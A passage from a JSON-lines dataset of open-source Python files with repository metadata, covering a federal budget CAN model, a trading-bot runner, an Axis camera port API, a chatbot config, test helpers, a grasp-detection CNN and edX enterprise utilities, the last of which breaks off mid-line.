== CAN.id)\n .where(self.__class__.id == self.id)\n )\n\n @property\n def fiscal_year(self):\n date_needed = self.date_needed or None\n month = date_needed.month if date_needed else -1\n year = date_needed.year if date_needed else -1\n return object_session(self).scalar(\n select(\n case(\n (month >= 10, year + 1),\n (month >= 0 and month < 10, year),\n else_=None,\n )\n )\n )\n\n @property\n def team_members(self):\n return self.agreement.team_members if self.agreement else []\n\n @override\n def to_dict(self):\n d = super().to_dict()\n\n if isinstance(self.status, str):\n self.status = BudgetLineItemStatus[self.status]\n\n d.update(\n status=self.status.name if self.status else None,\n amount=float(self.amount) if self.amount else None,\n proc_shop_fee_percentage=float(self.proc_shop_fee_percentage)\n if self.proc_shop_fee_percentage\n else None,\n date_needed=self.date_needed.isoformat() if self.date_needed else None,\n can=self.can.to_dict() if self.can else None,\n )\n\n return d\n\n\nclass CAN(BaseModel):\n \"\"\"\n A CAN is a Common Accounting Number, which is\n used to track money coming into OPRE\n\n This model contains all the relevant\n descriptive information about a given CAN\n \"\"\"\n\n __tablename__ = \"can\"\n id = Column(Integer, Identity(), primary_key=True)\n number = Column(String(30), nullable=False)\n description = Column(String)\n purpose = Column(String, default=\"\")\n nickname = Column(String(30))\n expiration_date = Column(DateTime)\n appropriation_date = Column(DateTime)\n appropriation_term = Column(Integer, default=\"1\")\n arrangement_type = Column(sa.Enum(CANArrangementType))\n funding_sources = relationship(\n FundingSource,\n secondary=can_funding_sources,\n back_populates=\"cans\",\n )\n authorizer_id = Column(Integer, ForeignKey(\"funding_partner.id\"))\n authorizer = relationship(FundingPartner)\n managing_portfolio_id = Column(Integer, ForeignKey(\"portfolio.id\"))\n managing_portfolio = relationship(Portfolio, back_populates=\"cans\")\n shared_portfolios = relationship(\n Portfolio, secondary=shared_portfolio_cans, back_populates=\"shared_cans\"\n )\n budget_line_items = relationship(\"BudgetLineItem\", back_populates=\"can\")\n\n @BaseModel.display_name.getter\n def display_name(self):\n return self.number\n\n @override\n def to_dict(self) -> dict[str, Any]:\n d: dict[str, Any] = super().to_dict()\n\n if isinstance(self.arrangement_type, str):\n self.arrangement_type = CANArrangementType[self.arrangement_type]\n\n d.update(\n appropriation_date=self.appropriation_date.strftime(\"%d/%m/%Y\")\n if self.appropriation_date\n else None,\n expiration_date=self.expiration_date.strftime(\"%d/%m/%Y\")\n if self.expiration_date\n else None,\n arrangement_type=self.arrangement_type.name\n if self.arrangement_type\n else None,\n )\n\n return d\n","repo_name":"HHS/OPRE-OPS","sub_path":"backend/models/cans.py","file_name":"cans.py","file_ext":"py","file_size_in_byte":17445,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"3"}
+{"seq_id":"3764911192","text":"from src.environment.env_custom import CustomTradingEnv\nfrom src.model.models import DRLAgent\nfrom src.evaluate.backtest import BackTest\nfrom src.preprocessing.data import build_features\n\n\ndef train_model(data, env_params, model_name, model_params, total_timesteps_model, log_tensorboard=None, tb_name=None):\n env_train_gym = CustomTradingEnv(df=data, **env_params)\n #env_train, _ = env_train_gym.get_sb_env()\n print(f\"Train from [{data['date'].iloc[0]}] to [{data['date'].iloc[-1]}]\")\n\n agent = DRLAgent(env=env_train_gym)\n model = agent.get_model(model_name=model_name, model_kwargs=model_params, tensorboard_log=log_tensorboard)\n return agent.train_model(model=model,\n tb_log_name=tb_name,\n total_timesteps=total_timesteps_model)\n\n\ndef test_model(data, env_params, model, with_graphs=False):\n print(f\"Test from [{data['date'].iloc[0]}] to [{data['date'].iloc[-1]}]\")\n env_test_gym = CustomTradingEnv(df=data, is_training=False, **env_params)\n _, _, allocation_values = DRLAgent.DRL_prediction(model=model, environment=env_test_gym)\n bat = BackTest(model, env_test_gym)\n results = bat.evaluate(allocation_values, data)\n if with_graphs:\n bat.plot_return_against_hold(allocation_values)\n return results\n","repo_name":"Toroi01/TradingRLBot","sub_path":"src/model/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"3"}
+{"seq_id":"31313163536","text":"\"\"\"Axis Vapix port management.\n\nhttps://www.axis.com/vapix-library/#/subjects/t10037719/section/t10074527\n\nI/O port API. Digital input and output ports.\nGeneral purpose I/O service API. Extends I/O port API with support for\n supervised I/Os and relay connectors.\nVirtual input API.\n\"\"\"\n\nfrom typing import Callable\nfrom urllib.parse import quote\n\nPROPERTY = \"Properties.API.HTTP.Version=3\"\n\nURL = \"/axis-cgi/io/port.cgi\"\n\nACTION_HIGH = \"/\"\nACTION_LOW = \"\\\\\"\n\nDIRECTION_IN = \"input\"\nDIRECTION_OUT = \"output\"\n\n\nclass Port:\n \"\"\"Represents a port.\"\"\"\n\n def __init__(self, id: str, raw: dict, request: Callable) -> None:\n \"\"\"Initialize port.\"\"\"\n self.id = id\n self.raw = raw\n self._request = request\n\n @property\n def configurable(self) -> bool:\n \"\"\"Is port configurable.\"\"\"\n return self.raw.get(\"Configurable\", False)\n\n @property\n def direction(self) -> str:\n \"\"\"Port is configured to act as input or output.\n\n Read-only for non-configurable ports.\n \"\"\"\n return self.raw.get(\"Direction\", DIRECTION_IN)\n\n @property\n def input_trig(self) -> str:\n \"\"\"When port should trigger.\n\n closed=The input port triggers when the circuit is closed.\n open=The input port triggers when the circuit is open.\n \"\"\"\n return self.raw.get(\"Input.Trig\", \"\")\n\n @property\n def name(self) -> str:\n \"\"\"Return name relevant to direction.\"\"\"\n if self.direction == DIRECTION_IN:\n return self.raw.get(\"Input.Name\", \"\")\n return self.raw.get(\"Output.Name\", \"\")\n\n @property\n def output_active(self) -> str:\n \"\"\"When is output port state active.\n\n closed=The output port is active when the circuit is closed.\n open=The output port is active when the circuit is open.\n \"\"\"\n return self.raw.get(\"Output.Active\", \"\")\n\n async def action(self, action: str) -> None:\n r\"\"\"Activate or deactivate an output.\n\n Use the option to activate/deactivate the port for a\n limited period of time.\n = Port name. Default: Name from Output.Name\n = Action character. /=active, \\=inactive\n = Delay before the next action. Unit: milliseconds\n Note: The :, / and \\ characters must be percent-encoded in the URI.\n See Percent encoding.\n Example:\n To set output 1 to active, use 1:/.\n In the URI, the action argument becomes action=1%3A%2F\n \"\"\"\n if not self.direction == DIRECTION_OUT:\n return\n\n port_action = quote(f\"{int(self.id) + 1}:{action}\", safe=\"\")\n url = URL + f\"?action={port_action}\"\n\n await self._request(\"get\", url)\n\n async def open(self) -> None:\n \"\"\"Open port.\"\"\"\n await self.action(ACTION_LOW)\n\n async def close(self) -> None:\n \"\"\"Close port.\"\"\"\n await self.action(ACTION_HIGH)\n","repo_name":"Kane610/axis","sub_path":"axis/vapix/models/port_cgi.py","file_name":"port_cgi.py","file_ext":"py","file_size_in_byte":2943,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"3"}
+{"seq_id":"74082854802","text":"import os\n# [step 1]>> 例如: API_KEY = \"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\" (此key无效)\nAPI_KEY = os.getenv('MY_SECRET_KEY')\n\n# [step 2]>> 改为True应用代理,如果直接在海外服务器部署,此处不修改\nUSE_PROXY = False if os.getenv('IS_USE_PROXY') == 'False' else True\n# USE_PROXY = False\n\nPORT = 7890\nif USE_PROXY:\n # 填写格式是 [协议]:// [地址] :[端口],填写之前不要忘记把USE_PROXY改成True,如果直接在海外服务器部署,此处不修改\n # 例如 \"socks5h://localhost:11284\"\n # [协议] 常见协议无非socks5h/http; 例如 v2**y 和 ss* 的默认本地协议是socks5h; 而cl**h 的默认本地协议是http\n # [地址] 懂的都懂,不懂就填localhost或者127.0.0.1肯定错不了(localhost意思是代理软件安装在本机上)\n # [端口] 在代理软件的设置里找。虽然不同的代理软件界面不一样,但端口号都应该在最显眼的位置上\n\n # 代理网络的地址,打开你的科学上网软件查看代理的协议(socks5/http)、地址(localhost)和端口(11284)\n proxies = {\n # [协议]:// [地址] :[端口]\n \"http\": \"socks5h://localhost:{}\".format(PORT),\n \"https\": \"socks5h://localhost:{}\".format(PORT),\n }\nelse:\n proxies = None\n\n# OpenAI的API_URL\nAPI_URL = \"https://api.openai.com/v1/chat/completions\"\n# API_URL = os.getenv('MY_BASE_URL')\n\n# 多线程函数插件中,默认允许多少路线程同时访问OpenAI。\n# Free trial users的限制是每分钟3次,Pay-as-you-go users的限制是每分钟3500次。提高限制请查询:\n# https://platform.openai.com/docs/guides/rate-limits/overview\nDEFAULT_WORKER_NUM = 3\n\n\n# [step 3]>> 以下配置可以优化体验,但大部分场合下并不需要修改\n# 对话窗的高度\nCHATBOT_HEIGHT = 1115\n\n# 代码高亮\nCODE_HIGHLIGHT = True\n\n# 窗口布局\nLAYOUT = \"LEFT-RIGHT\" # \"LEFT-RIGHT\"(左右布局) # \"TOP-DOWN\"(上下布局)\n\n# 发送请求到OpenAI后,等待多久判定为超时\nTIMEOUT_SECONDS = 30\n\n# 网页的端口, -1代表随机端口\nWEB_PORT = -1\n\n# 如果OpenAI不响应(网络卡顿、代理失败、KEY失效),重试的次数限制\nMAX_RETRY = 2\n\n# OpenAI模型选择是(gpt4现在只对申请成功的人开放)\nLLM_MODEL = \"gpt-3.5-turbo\"\n\n# 设置并行使用的线程数\nCONCURRENT_COUNT = 10\n\n# 设置用户名和密码(相关功能不稳定,与gradio版本和网络都相关,如果本地使用不建议加这个)\n# [(\"username\", \"password\"), (\"username2\", \"password2\"), ...]\nAUTHENTICATION = []\n","repo_name":"Jehuty-ML/chatgpt-academic","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2602,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
+{"seq_id":"29256868357","text":"import calendar\nimport time\nfrom asyncio import coroutine\nfrom datetime import date, datetime, timezone\nfrom decimal import Decimal\nfrom typing import Optional, Union\nfrom unittest.mock import Mock\n\nfrom google.protobuf import timestamp_pb2\n\n\ndef dt(\n value: Union[int, str], *, as_proto: bool = False\n) -> Union[datetime, date, timestamp_pb2.Timestamp]:\n\n if isinstance(value, int):\n res = datetime.fromtimestamp(value, tz=timezone.utc)\n elif len(value) > 10:\n res = datetime(\n *time.strptime(value, \"%Y-%m-%d %H:%M:%S\")[:6], tzinfo=timezone.utc\n )\n else:\n res = date(*time.strptime(value, \"%Y-%m-%d\")[:3])\n\n if as_proto:\n seconds = (\n calendar.timegm(res.timetuple())\n if isinstance(res, date)\n else int(res.timestamp())\n )\n res = timestamp_pb2.Timestamp(seconds=seconds)\n\n return res\n\n\ndef dt_timestamp(value: Union[str, int]) -> int:\n return int(dt(value).timestamp())\n\n\ndef coro_mock():\n coro = Mock(name=\"CoroutineResult\")\n corofunc = Mock(name=\"CoroutineFunction\", side_effect=coroutine(coro))\n corofunc.coro = coro\n return corofunc\n\n\ndef make_event(\n campaign_id: int,\n timestamp: int,\n name: Optional[str] = \"pin.show\",\n cost: Optional[Decimal] = None,\n event_group_id: str = \"37b36bd03bf84fcfe8f95ab43191653c\",\n) -> tuple:\n return (\n datetime.utcfromtimestamp(timestamp),\n campaign_id,\n event_group_id,\n 4,\n \"4CE92B30-6A33-457D-A7D4-1B8CBAD54597\",\n \"iOS\",\n \"1112\",\n 11476,\n 55.718732876522175,\n 37.40151579701865,\n f\"geoadv.bb.{name}\",\n ) + ((cost,) if cost is not None else ())\n\n\ndef make_charged_event(*args):\n return make_event(campaign_id=args[0], timestamp=args[1], cost=args[2])\n\n\ndef setup_normalized_db(ch_client, events_args):\n normalized_existing = [make_event(*args) for args in events_args]\n ch_client.execute(\"INSERT INTO stat.normalized_sample VALUES\", normalized_existing)\n\n\ndef setup_charged_db(ch_client, events_args):\n charged_existing = [make_charged_event(*args) for args in events_args]\n ch_client.execute(\"INSERT INTO stat.accepted_sample VALUES\", charged_existing)\n\n\nclass Any:\n def __init__(self, _type):\n self._type = _type\n\n def __eq__(self, another):\n return isinstance(another, self._type)\n\n\ndef squash_whitespaces(source: str):\n return \" \".join(source.split())\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"maps/tests/tools (3).py","file_name":"tools (3).py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"12608038643","text":"\"\"\"\nHelper Methods\n\"\"\"\n\ntry:\n from braze.client import BrazeClient\nexcept ImportError:\n BrazeClient = None\nfrom django.conf import settings\ntry:\n from optimizely import optimizely\n from optimizely.config_manager import PollingConfigManager\nexcept ImportError:\n optimizely = None\n PollingConfigManager = None\n\n\ndef _get_key(key_or_id, key_cls):\n \"\"\"\n Helper method to get a course/usage key either from a string or a key_cls,\n where the key_cls (CourseKey or UsageKey) will simply be returned.\n \"\"\"\n return (\n key_cls.from_string(key_or_id)\n if isinstance(key_or_id, str)\n else key_or_id\n )\n\n\ndef get_braze_client():\n \"\"\" Returns a Braze client. \"\"\"\n if not BrazeClient:\n return None\n\n braze_api_key = settings.EDX_BRAZE_API_KEY\n braze_api_url = settings.EDX_BRAZE_API_SERVER\n\n if not braze_api_key or not braze_api_url:\n return None\n\n return BrazeClient(\n api_key=braze_api_key,\n api_url=braze_api_url,\n app_id='',\n )\n\n\nclass OptimizelyClient:\n \"\"\" Class for instantiating an Optimizely full stack client instance. \"\"\"\n optimizely_client = None\n\n @classmethod\n def get_optimizely_client(cls):\n if not optimizely:\n return None\n if not cls.optimizely_client:\n optimizely_sdk_key = settings.OPTIMIZELY_FULLSTACK_SDK_KEY\n if not optimizely_sdk_key:\n return None\n\n config_manager = PollingConfigManager(\n update_interval=10,\n sdk_key=optimizely_sdk_key,\n )\n cls.optimizely_client = optimizely.Optimizely(config_manager=config_manager)\n\n return cls.optimizely_client\n","repo_name":"openedx/edx-platform","sub_path":"lms/djangoapps/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","stars":6774,"dataset":"github-code","pt":"3"}
+{"seq_id":"30236859490","text":"import unittest\nimport sys, os\nimport numpy as np\nsys.path.append(os.path.abspath(sys.path[0]) + '/../')\nfrom startracker.angular_distance import AngularDistance\nfrom startracker.star import Star\n\nclass AngularDistanceTest(unittest.TestCase):\n \n def setUp(self):\n star1 = Star(0,1,sph=(0,0))\n star2 = Star(1,1,sph=(np.pi,0))\n star3 = Star(2,1,sph=(np.pi/3,0))\n star4 = Star(3,1,sph=(np.pi/2,0))\n self.d1 = AngularDistance(star1,star2)\n self.d2 = AngularDistance(star1,star3)\n self.d3 = AngularDistance(star2,star3)\n self.d4 = AngularDistance(star1,star4)\n\n def test_equal_to_self(self):\n self.assertEquals(self.d1, self.d1)\n\n def test_not_equal_to_others(self):\n self.assertNotEquals(self.d1, self.d2)\n self.assertNotEquals(self.d1, self.d3)\n self.assertNotEquals(self.d1, self.d4)\n\n def test_check_triplet_true(self):\n self.assertEquals(self.d1.check_triplet(self.d2,self.d3), True)\n\n def test_check_triplet_false(self):\n self.assertEquals(self.d1.check_triplet(self.d2,self.d4), False)\n \n \n","repo_name":"ali-tny/lost-in-space","sub_path":"tests/test_angular_distance.py","file_name":"test_angular_distance.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"7163091445","text":"import torch\nimport torch.nn as nn\n\nclass GGCNN(nn.Module):\n def __init__(self, input_channel=1, filter_sizes=[32,16,8,8,16,32], kernel_sizes=[9, 5, 3, 3, 5, 9], strides=[3, 2, 2, 2, 2, 3], paddings=[3, 2, 1, 1, 2, 3]):\n super().__init__()\n # input channel은 depth image라서 1을 기본으로 지정한다.\n # input image H W = 300 300\n\n self.conv1 = nn.Conv2d(input_channel, filter_sizes[0], kernel_sizes[0], stride=strides[0], padding=paddings[0]) # output 100 100\n self.conv2 = nn.Conv2d(filter_sizes[0], filter_sizes[1], kernel_sizes[1], stride=strides[1], padding=paddings[1]) # output 50 50\n self.conv3 = nn.Conv2d(filter_sizes[1], filter_sizes[2], kernel_sizes[2], stride=strides[2], padding=paddings[2]) # output 25 25\n self.conv_trans1 = nn.ConvTranspose2D(filter_sizes[2], filter_sizes[3], kernel_sizes[3], stride=strides[3], padding=paddings[3], output_padding=1) # output 50 50\n self.conv_trans2 = nn.ConvTranspose2D(filter_sizes[3], filter_sizes[4], kernel_sizes[4], stride=strides[4], padding=paddings[4], output_padding=1) # output 100 100\n self.conv_trans3 = nn.ConvTranspose2D(filter_sizes[4], filter_sizes[5], kernel_sizes[5], stride=strides[5], padding=paddings[5], output_padding=1) # output 301 301. 의도적으로 1 크게 함\n self.relu = nn.ReLU()\n\n self.body = nn.Sequential( # input & output 300 300\n self.conv1, self.relu,\n self.conv2, self.relu,\n self.conv3, self.relu,\n self.conv_trans1, self.relu,\n self.conv_trans2, self.relu,\n self.conv_trans3, self.relu\n ) \n\n self.pos_output = nn.Conv2d(filter_sizes[5], 1, kernel_size=2) # output 300 300\n self.cos_output = nn.Conv2d(filter_sizes[5], 1, kernel_size=2) # output 300 300\n self.sin_output = nn.Conv2d(filter_sizes[5], 1, kernel_size=2) # output 300 300\n self.width_output = nn.Conv2d(filter_sizes[5], 1, kernel_size=2) # output 300 300\n\n def forward(self, x):\n x = self.body(x)\n pos_output = self.pos_output(x)\n cos_output = self.cos_output(x)\n sin_output = self.sin_output(x)\n width_output = self.width_output(x)\n\n return pos_output, cos_output, sin_output, width_output\n \n def loss(self, x_data, y_data):\n pos_real, cos_real, sin_real, width_real = y_data\n pos_pred, cos_pred, sin_pred, width_pred = self.forward(x_data)\n \n # use L2 loss\n loss = nn.MSELoss()\n pos_loss, cos_loss, sin_loss, width_loss = loss(pos_pred, pos_real), loss(cos_pred, cos_real), loss(sin_pred, sin_real), loss(width_pred, width_real)\n\n return {\n 'total_loss': pos_loss + cos_loss + sin_loss + width_loss,\n 'loss': {\n 'pos_loss': pos_loss,\n 'cos_loss': cos_loss,\n 'sin_loss': sin_loss,\n 'width_loss': width_loss\n },\n 'pred': {\n 'pos': pos_pred,\n 'cos': cos_pred,\n 'sin': sin_pred,\n 'width': width_pred\n }\n }\n","repo_name":"engineerJPark/GGCNN-reproduction","sub_path":"src/ggcnn/ggcnn_model.py","file_name":"ggcnn_model.py","file_ext":"py","file_size_in_byte":3134,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
+{"seq_id":"12616988273","text":"\"\"\"\nUtility methods for Enterprise\n\"\"\"\n\n\nimport json\n\nfrom completion.exceptions import UnavailableCompletionData\nfrom completion.utilities import get_key_to_last_completed_block\nfrom crum import get_current_request\nfrom django.conf import settings\nfrom django.core.cache import cache\nfrom django.urls import NoReverseMatch, reverse\nfrom django.utils.translation import gettext as _\nfrom edx_django_utils.cache import TieredCache, get_cache_key\nfrom edx_toggles.toggles import WaffleFlag\nfrom enterprise.api.v1.serializers import EnterpriseCustomerBrandingConfigurationSerializer\nfrom enterprise.models import EnterpriseCustomer, EnterpriseCustomerUser\nfrom social_django.models import UserSocialAuth\n\nfrom common.djangoapps import third_party_auth\nfrom common.djangoapps.student.helpers import get_next_url_for_login_page\nfrom lms.djangoapps.branding.api import get_privacy_url\nfrom openedx.core.djangoapps.site_configuration import helpers as configuration_helpers\nfrom openedx.core.djangoapps.user_authn.cookies import standard_cookie_settings\nfrom openedx.core.djangolib.markup import HTML, Text\n\nENTERPRISE_HEADER_LINKS = WaffleFlag('enterprise.enterprise_header_links', __name__) # lint-amnesty, pylint: disable=toggle-missing-annotation\n\n\ndef get_data_consent_share_cache_key(user_id, course_id, enterprise_customer_uuid=None):\n \"\"\"\n Returns cache key for data sharing consent needed against user_id, course_id and enterprise_customer_uuid\n \"\"\"\n cache_key_params = dict(\n type='data_sharing_consent_needed',\n user_id=user_id,\n course_id=course_id,\n )\n\n if enterprise_customer_uuid:\n cache_key_params['enterprise_customer_uuid'] = enterprise_customer_uuid\n\n return get_cache_key(**cache_key_params)\n\n\ndef get_is_enterprise_cache_key(user_id):\n \"\"\"\n Returns cache key for the enterprise learner validation method needed against user_id.\n \"\"\"\n return get_cache_key(type='is_enterprise_learner', user_id=user_id)\n\n\ndef clear_data_consent_share_cache(user_id, course_id, enterprise_customer_uuid):\n \"\"\"\n clears data_sharing_consent_needed cache\n \"\"\"\n consent_cache_key = get_data_consent_share_cache_key(user_id, course_id, enterprise_customer_uuid)\n TieredCache.delete_all_tiers(consent_cache_key)\n\n\ndef update_logistration_context_for_enterprise(request, context, enterprise_customer):\n \"\"\"\n Take the processed context produced by the view, determine if it's relevant\n to a particular Enterprise Customer, and update it to include that customer's\n enterprise metadata.\n\n Arguments:\n request (HttpRequest): The request for the logistration page.\n context (dict): Context for logistration page.\n enterprise_customer (dict): data for enterprise customer\n\n \"\"\"\n sidebar_context = {}\n if enterprise_customer:\n is_proxy_login = request.GET.get('proxy_login')\n sidebar_context = get_enterprise_sidebar_context(enterprise_customer, is_proxy_login)\n\n if sidebar_context:\n context['data']['registration_form_desc']['fields'] = enterprise_fields_only(\n context['data']['registration_form_desc']\n )\n context.update(sidebar_context)\n context['enable_enterprise_sidebar'] = True\n context['data']['hide_auth_warnings'] = True\n context['data']['enterprise_name'] = enterprise_customer['name']\n else:\n context['enable_enterprise_sidebar'] = False\n\n update_third_party_auth_context_for_enterprise(request, context, enterprise_customer)\n\n\ndef get_enterprise_sidebar_context(enterprise_customer, is_proxy_login):\n \"\"\"\n Get context information for enterprise sidebar for the given enterprise customer.\n\n Args:\n enterprise_customer (dict): customer data from enterprise-customer endpoint, cached\n is_proxy_login (bool): If True, use proxy login welcome template\n\n Returns: Enterprise Sidebar Context with the following key-value pairs.\n {\n 'enterprise_name': 'Enterprise Name',\n 'enterprise_logo_url': 'URL of the enterprise logo image',\n 'enterprise_branded_welcome_string': 'Human readable welcome message customized for the enterprise',\n 'platform_welcome_string': 'Human readable welcome message for an enterprise learner',\n }\n \"\"\"\n platform_name = configuration_helpers.get_value('PLATFORM_NAME', settings.PLATFORM_NAME)\n\n branding_configuration = enterprise_customer.get('branding_configuration', {})\n logo_url = branding_configuration.get('logo', '') if isinstance(branding_configuration, dict) else ''\n\n if is_proxy_login:\n branded_welcome_template = configuration_helpers.get_value(\n 'ENTERPRISE_PROXY_LOGIN_WELCOME_TEMPLATE',\n settings.ENTERPRISE_PROXY_LOGIN_WELCOME_TEMPLATE\n )\n else:\n branded_welcome_template = configuration_helpers.get_value(\n 'ENTERPRISE_SPECIFIC_BRANDED_WELCOME_TEMPLATE',\n settings.ENTERPRISE_SPECIFIC_BRANDED_WELCOME_TEMPLATE\n )\n\n branded_welcome_string = Text(branded_welcome_template).format(\n start_bold=HTML(''),\n end_bold=HTML(''),\n line_break=HTML(' '),\n enterprise_name=enterprise_customer['name'],\n platform_name=platform_name,\n privacy_policy_link_start=HTML(\"\").format(\n pp_url=get_privacy_url()\n ),\n privacy_policy_link_end=HTML(\"\"),\n )\n\n platform_welcome_template = configuration_helpers.get_value(\n 'ENTERPRISE_PLATFORM_WELCOME_TEMPLATE',\n settings.ENTERPRISE_PLATFORM_WELCOME_TEMPLATE\n )\n platform_welcome_string = platform_welcome_template.format(platform_name=platform_name)\n\n return {\n 'enterprise_name': enterprise_customer['name'],\n 'enterprise_logo_url': logo_url,\n 'enterprise_branded_welcome_string': branded_welcome_string,\n 'platform_welcome_string': platform_welcome_string,\n }\n\n\ndef enterprise_fields_only(fields):\n \"\"\"\n Take the received field definition, and exclude those fields that we don't want\n to require if the user is going to be a member of an Enterprise Customer.\n \"\"\"\n enterprise_exclusions = configuration_helpers.get_value(\n 'ENTERPRISE_EXCLUDED_REGISTRATION_FIELDS',\n settings.ENTERPRISE_EXCLUDED_REGISTRATION_FIELDS\n )\n return [field for field in fields['fields'] if field['name'] not in enterprise_exclusions]\n\n\ndef update_third_party_auth_context_for_enterprise(request, context, enterprise_customer=None):\n \"\"\"\n Return updated context of third party auth with modified data for the given enterprise customer.\n\n Arguments:\n request (HttpRequest): The request for the logistration page.\n context (dict): Context for third party auth providers and auth pipeline.\n enterprise_customer (dict): data for enterprise customer\n\n Returns:\n context (dict): Updated context of third party auth with modified\n `errorMessage`.\n \"\"\"\n if context['data']['third_party_auth']['errorMessage']:\n context['data']['third_party_auth']['errorMessage'] = Text(_(\n 'We are sorry, you are not authorized to access {platform_name} via this channel. '\n 'Please contact your learning administrator or manager in order to access {platform_name}.'\n '{line_break}{line_break}'\n 'Error Details:{line_break}{error_message}')\n ).format(\n platform_name=configuration_helpers.get_value('PLATFORM_NAME', settings.PLATFORM_NAME),\n error_message=context['data']['third_party_auth']['errorMessage'],\n line_break=HTML(' ')\n )\n\n if enterprise_customer:\n context['data']['third_party_auth']['providers'] = []\n context['data']['third_party_auth']['secondaryProviders'] = []\n\n running_pipeline = third_party_auth.pipeline.get(request)\n if running_pipeline is not None:\n current_provider = third_party_auth.provider.Registry.get_from_pipeline(running_pipeline)\n if current_provider is not None and current_provider.skip_registration_form and enterprise_customer:\n # For enterprise (and later for everyone), we need to get explicit consent to the\n # Terms of service instead of auto submitting the registration form outright.\n context['data']['third_party_auth']['autoSubmitRegForm'] = False\n context['data']['third_party_auth']['autoRegisterWelcomeMessage'] = Text(_(\n 'Thank you for joining {platform_name}. '\n 'Just a couple steps before you start learning!')\n ).format(\n platform_name=configuration_helpers.get_value('PLATFORM_NAME', settings.PLATFORM_NAME)\n )\n context['data']['third_party_auth']['registerFormSubmitButtonText'] = _('Continue')\n\n return context\n\n\ndef handle_enterprise_cookies_for_logistration(request, response, context):\n \"\"\"\n Helper method for setting or deleting enterprise cookies on logistration response.\n\n Arguments:\n request (HttpRequest): The request for the logistration page.\n response (HttpResponse): The response for the logistration page.\n context (dict): Context for logistration page.\n\n \"\"\"\n # This cookie can be used for tests or minor features,\n # but should not be used for payment related or other critical work\n # since users can edit their cookies\n _set_experiments_is_enterprise_cookie(request, response, context['enable_enterprise_sidebar'])\n\n # Remove enterprise cookie so that subsequent requests show default login page.\n response.delete_cookie(\n configuration_helpers.get_value('ENTERPRISE_CUSTOMER_COOKIE_NAME', settings.ENTERPRISE_CUSTOMER_COOKIE_NAME),\n domain=configuration_helpers.get_value('BASE_COOKIE_DOMAIN', settings.BASE_COOKIE_DOMAIN),\n )\n\n\ndef _set_experiments_is_enterprise_cookie(request, response, experiments_is_enterprise):\n \"\"\" Sets the experiments_is_enterprise cookie on the response.\n This cookie can be used for tests or minor features,\n but should not be used for payment related or other critical work\n since users can edit their cookies\n \"\"\"\n cookie_settings = standard_cookie_settings(request)\n\n response.set_cookie(\n 'experiments_is_enterprise',\n json.dumps(experiments_is_enterprise),\n **cookie_settings\n )\n\n\ndef update_account_settings_context_for_enterprise(context, enterprise_customer, user):\n \"\"\"\n Take processed context for account settings page and update it taking enterprise customer into account.\n\n Arguments:\n context (dict): Context for account settings page.\n enterprise_customer (dict): data for enterprise customer\n user (User): request user\n \"\"\"\n enterprise_context = {\n 'enterprise_name': enterprise_customer['name'] if enterprise_customer else None,\n 'sync_learner_profile_data': _get_sync_learner_profile_data(enterprise_customer),\n 'edx_support_url': configuration_helpers.get_value('SUPPORT_SITE_LINK', settings.SUPPORT_SITE_LINK),\n 'enterprise_readonly_account_fields': {\n 'fields': list(get_enterprise_readonly_account_fields(user))\n }\n }\n context.update(enterprise_context)\n\n\ndef get_enterprise_readonly_account_fields(user):\n \"\"\"\n Returns a set of account fields that are read-only for enterprise users.\n \"\"\"\n # TODO circular dependency between enterprise_support.api and enterprise_support.utils\n from openedx.features.enterprise_support.api import enterprise_customer_for_request\n enterprise_customer = enterprise_customer_for_request(get_current_request())\n\n enterprise_readonly_account_fields = list(settings.ENTERPRISE_READONLY_ACCOUNT_FIELDS)\n\n # if user has no `UserSocialAuth` record then allow to edit `fullname`\n # whether the `sync_learner_profile_data` is enabled or disabled\n user_social_auth_record = _user_has_social_auth_record(user, enterprise_customer)\n if not user_social_auth_record:\n enterprise_readonly_account_fields.remove('name')\n\n sync_learner_profile_data = _get_sync_learner_profile_data(enterprise_customer)\n return set(enterprise_readonly_account_fields) if sync_learner_profile_data else set()\n\n\ndef _user_has_social_auth_record(user, enterprise_customer):\n \"\"\"\n Return True if a `UserSocialAuth` record exists for `user` False otherwise.\n \"\"\"\n provider_backend_names = []\n if enterprise_customer and enterprise_customer['identity_providers']:\n for idp in enterprise_customer['identity_providers']:\n identity_provider = third_party_auth.provider.Registry.get(\n provider_id=idp['provider_id']\n )\n provider_backend_names.append(identity_provider.backend_name)\n return UserSocialAuth.objects.select_related('user').\\\n filter(provider__in=provider_backend_names, user=user).exists()\n return False\n\n\ndef _get_sync_learner_profile_data(enterprise_customer):\n \"\"\"\n Returns whether the configuration of the given enterprise customer supports\n synching learner profile data.\n \"\"\"\n if enterprise_customer:\n identity_provider = third_party_auth.provider.Registry.get(\n provider_id=enterprise_customer['identity_provider'],\n )\n if identity_provider:\n return identity_provider.sync_learner_profile_data\n\n return False\n\n\ndef get_enterprise_learner_portal(request):\n \"\"\"\n Gets the formatted portal name and slug that can be used\n to generate a link for an enabled enterprise Learner Portal.\n\n Caches and returns result in/from the user's request session if provided.\n \"\"\"\n # Prevent a circular import.\n from openedx.features.enterprise_support.api import enterprise_enabled, enterprise_customer_uuid_for_request\n\n user = request.user\n # Only cache this if a learner is authenticated (AnonymousUser exists and should not be tracked)\n\n learner_portal_session_key = 'enterprise_learner_portal'\n\n if enterprise_enabled() and ENTERPRISE_HEADER_LINKS.is_enabled() and user and user.id:\n # If the key exists return that value\n if learner_portal_session_key in request.session:\n return json.loads(request.session[learner_portal_session_key])\n\n kwargs = {\n 'user_id': user.id,\n 'enterprise_customer__enable_learner_portal': True,\n }\n enterprise_customer_uuid = enterprise_customer_uuid_for_request(request)\n if enterprise_customer_uuid:\n kwargs['enterprise_customer__uuid'] = 